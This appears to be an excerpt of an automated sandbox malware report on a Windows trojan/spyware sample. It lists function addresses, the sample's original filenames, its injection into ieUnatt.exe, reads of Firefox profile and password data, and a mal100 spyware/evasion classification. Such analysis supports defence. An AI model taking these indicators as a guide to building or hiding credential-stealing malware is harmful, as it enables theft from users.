                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0042F2535_2_0042F253
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_004022E05_2_004022E0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0041046B5_2_0041046B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_004104735_2_00410473
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_004025F05_2_004025F0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_00416DF35_2_00416DF3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_00416DAC5_2_00416DAC
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0040E6735_2_0040E673
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_004106935_2_00410693
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_00402F255_2_00402F25
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_00402F305_2_00402F30
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0040E7C35_2_0040E7C3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0040E7B75_2_0040E7B7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A01AA5_2_019A01AA
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019941A25_2_019941A2
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019981CC5_2_019981CC
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D01005_2_018D0100
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197A1185_2_0197A118
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019681585_2_01968158
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019720005_2_01972000
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A03E65_2_019A03E6
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018EE3F05_2_018EE3F0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199A3525_2_0199A352
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019602C05_2_019602C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019802745_2_01980274
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A05915_2_019A0591
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E05355_2_018E0535
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0198E4F65_2_0198E4F6
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019844205_2_01984420
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019924465_2_01992446
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DC7C05_2_018DC7C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019047505_2_01904750
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E07705_2_018E0770
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FC6E05_2_018FC6E0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E29A05_2_018E29A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019AA9A65_2_019AA9A6
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F69625_2_018F6962
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018C68B85_2_018C68B8
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190E8F05_2_0190E8F0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E28405_2_018E2840
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018EA8405_2_018EA840
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01996BD75_2_01996BD7
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199AB405_2_0199AB40
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DEA805_2_018DEA80
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F8DBF5_2_018F8DBF
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DADE05_2_018DADE0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197CD1F5_2_0197CD1F
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018EAD005_2_018EAD00
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01980CB55_2_01980CB5
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D0CF25_2_018D0CF2
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0C005_2_018E0C00
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195EFA05_2_0195EFA0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D2FC85_2_018D2FC8
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018ECFE05_2_018ECFE0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01900F305_2_01900F30
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01982F305_2_01982F30
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01922F285_2_01922F28
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01954F405_2_01954F40
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199CE935_2_0199CE93
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F2E905_2_018F2E90
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199EEDB5_2_0199EEDB
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199EE265_2_0199EE26
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0E595_2_018E0E59
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018EB1B05_2_018EB1B0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019AB16B5_2_019AB16B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0191516C5_2_0191516C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CF1725_2_018CF172
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E70C05_2_018E70C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0198F0CC5_2_0198F0CC
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019970E95_2_019970E9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199F0E05_2_0199F0E0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0192739A5_2_0192739A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199132D5_2_0199132D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CD34C5_2_018CD34C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E52A05_2_018E52A0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FB2C05_2_018FB2C0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019812ED5_2_019812ED
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197D5B05_2_0197D5B0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019975715_2_01997571
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199F43F5_2_0199F43F
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D14605_2_018D1460
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199F7B05_2_0199F7B0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019916CC5_2_019916CC
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019759105_2_01975910
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E99505_2_018E9950
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FB9505_2_018FB950
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E38E05_2_018E38E0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194D8005_2_0194D800
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FFB805_2_018FFB80
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01955BF05_2_01955BF0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0191DBF95_2_0191DBF9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199FB765_2_0199FB76
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01925AA05_2_01925AA0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197DAAC5_2_0197DAAC
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01981AA35_2_01981AA3
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0198DAC65_2_0198DAC6
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199FA495_2_0199FA49
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01997A465_2_01997A46
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01953A6C5_2_01953A6C
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FFDC05_2_018FFDC0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01991D5A5_2_01991D5A
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E3D405_2_018E3D40
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01997D735_2_01997D73
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199FCF25_2_0199FCF2
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01959C325_2_01959C32
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E1F925_2_018E1F92
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199FFB15_2_0199FFB1
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018A3FD25_2_018A3FD2
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018A3FD55_2_018A3FD5
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199FF095_2_0199FF09
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E9EB05_2_018E9EB0
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeCode function: 7_2_03603A2F7_2_03603A2F
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeCode function: 7_2_03603A3B7_2_03603A3B
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeCode function: 7_2_0360590B7_2_0360590B
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeCode function: 7_2_0360C06B7_2_0360C06B
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeCode function: 7_2_0360C0247_2_0360C024
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeCode function: 7_2_036038EB7_2_036038EB
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeCode function: 7_2_0360DE6B7_2_0360DE6B
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeCode function: 7_2_036056E37_2_036056E3
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeCode function: 7_2_036056EB7_2_036056EB
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeCode function: 7_2_036244CB7_2_036244CB
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050805358_2_05080535
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051405918_2_05140591
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051244208_2_05124420
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051324468_2_05132446
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0512E4F68_2_0512E4F6
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050A47508_2_050A4750
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050807708_2_05080770
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0507C7C08_2_0507C7C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0509C6E08_2_0509C6E0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050701008_2_05070100
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0511A1188_2_0511A118
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051081588_2_05108158
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051401AA8_2_051401AA
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051381CC8_2_051381CC
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051120008_2_05112000
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0513A3528_2_0513A352
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051403E68_2_051403E6
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0508E3F08_2_0508E3F0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051202748_2_05120274
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051002C08_2_051002C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0508AD008_2_0508AD00
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0511CD1F8_2_0511CD1F
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05098DBF8_2_05098DBF
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0507ADE08_2_0507ADE0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05080C008_2_05080C00
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05120CB58_2_05120CB5
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05070CF28_2_05070CF2
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05122F308_2_05122F30
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050C2F288_2_050C2F28
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050A0F308_2_050A0F30
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050F4F408_2_050F4F40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050FEFA08_2_050FEFA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05072FC88_2_05072FC8
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0508CFE08_2_0508CFE0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0513EE268_2_0513EE26
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05080E598_2_05080E59
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0513CE938_2_0513CE93
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05092E908_2_05092E90
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0513EEDB8_2_0513EEDB
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050969628_2_05096962
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050829A08_2_050829A0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0514A9A68_2_0514A9A6
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0508A8408_2_0508A840
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050828408_2_05082840
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050668B88_2_050668B8
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050AE8F08_2_050AE8F0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0513AB408_2_0513AB40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05136BD78_2_05136BD7
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0507EA808_2_0507EA80
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051375718_2_05137571
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0511D5B08_2_0511D5B0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0513F43F8_2_0513F43F
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050714608_2_05071460
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0513F7B08_2_0513F7B0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051316CC8_2_051316CC
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050B516C8_2_050B516C
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0506F1728_2_0506F172
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0514B16B8_2_0514B16B
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0508B1B08_2_0508B1B0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050870C08_2_050870C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0512F0CC8_2_0512F0CC
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0513F0E08_2_0513F0E0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051370E98_2_051370E9
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0513132D8_2_0513132D
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0506D34C8_2_0506D34C
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050C739A8_2_050C739A
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050852A08_2_050852A0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0509B2C08_2_0509B2C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051212ED8_2_051212ED
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05083D408_2_05083D40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05131D5A8_2_05131D5A
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05137D738_2_05137D73
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0509FDC08_2_0509FDC0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050F9C328_2_050F9C32
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0513FCF28_2_0513FCF2
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0513FF098_2_0513FF09
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05081F928_2_05081F92
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0513FFB18_2_0513FFB1
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05089EB08_2_05089EB0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_051159108_2_05115910
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050899508_2_05089950
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0509B9508_2_0509B950
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050ED8008_2_050ED800
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050838E08_2_050838E0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0513FB768_2_0513FB76
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0509FB808_2_0509FB80
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050BDBF98_2_050BDBF9
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050F5BF08_2_050F5BF0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05137A468_2_05137A46
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0513FA498_2_0513FA49
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050F3A6C8_2_050F3A6C
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_050C5AA08_2_050C5AA0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_05121AA38_2_05121AA3
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0511DAAC8_2_0511DAAC
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0512DAC68_2_0512DAC6
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F723908_2_02F72390
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F8C0A08_2_02F8C0A0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F6D2C08_2_02F6D2C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F6D2B88_2_02F6D2B8
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F6B6108_2_02F6B610
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F6B6048_2_02F6B604
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F6D4E08_2_02F6D4E0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F6B4C08_2_02F6B4C0
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F75A408_2_02F75A40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F73BF98_2_02F73BF9
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_02F73C408_2_02F73C40
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0539E4438_2_0539E443
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0539E7E18_2_0539E7E1
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0539E3288_2_0539E328
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0539D8A88_2_0539D8A8
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: 8_2_0539CB638_2_0539CB63
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 050EEA12 appears 86 times
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 050C7E54 appears 102 times
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 0506B970 appears 280 times
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 050B5130 appears 58 times
                Source: C:\Windows\SysWOW64\ieUnatt.exeCode function: String function: 050FF290 appears 105 times
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: String function: 01915130 appears 58 times
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: String function: 0194EA12 appears 86 times
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: String function: 01927E54 appears 102 times
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: String function: 018CB970 appears 280 times
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: String function: 0195F290 appears 105 times
                Source: NFhRxwbegd.exe, 00000000.00000002.2390346855.0000000006B50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs NFhRxwbegd.exe
                Source: NFhRxwbegd.exe, 00000000.00000002.2387344166.00000000037D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs NFhRxwbegd.exe
                Source: NFhRxwbegd.exe, 00000000.00000002.2391304053.000000000A090000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs NFhRxwbegd.exe
                Source: NFhRxwbegd.exe, 00000000.00000002.2384378545.000000000092E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs NFhRxwbegd.exe
                Source: NFhRxwbegd.exe, 00000000.00000000.2207833738.0000000000434000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameCuUp.exe, vs NFhRxwbegd.exe
                Source: NFhRxwbegd.exe, 00000005.00000002.2561345341.00000000019CD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NFhRxwbegd.exe
                Source: NFhRxwbegd.exe, 00000005.00000002.2560705901.000000000147C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEUNATT.EXED vs NFhRxwbegd.exe
                Source: NFhRxwbegd.exe, 00000005.00000002.2560705901.0000000001448000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIEUNATT.EXED vs NFhRxwbegd.exe
                Source: NFhRxwbegd.exeBinary or memory string: OriginalFilenameCuUp.exe, vs NFhRxwbegd.exe
                Source: NFhRxwbegd.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: NFhRxwbegd.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@11/9
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NFhRxwbegd.exe.logJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile created: C:\Users\user\AppData\Local\Temp\086604I_PJump to behavior
                Source: NFhRxwbegd.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: NFhRxwbegd.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ieUnatt.exe, 00000008.00000002.4082613666.0000000003494000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2748377158.000000000348A000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.00000000034B9000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000002.4082613666.000000000348A000.00000004.00000020.00020000.00000000.sdmp, ieUnatt.exe, 00000008.00000003.2747478767.0000000003469000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: NFhRxwbegd.exeVirustotal: Detection: 76%
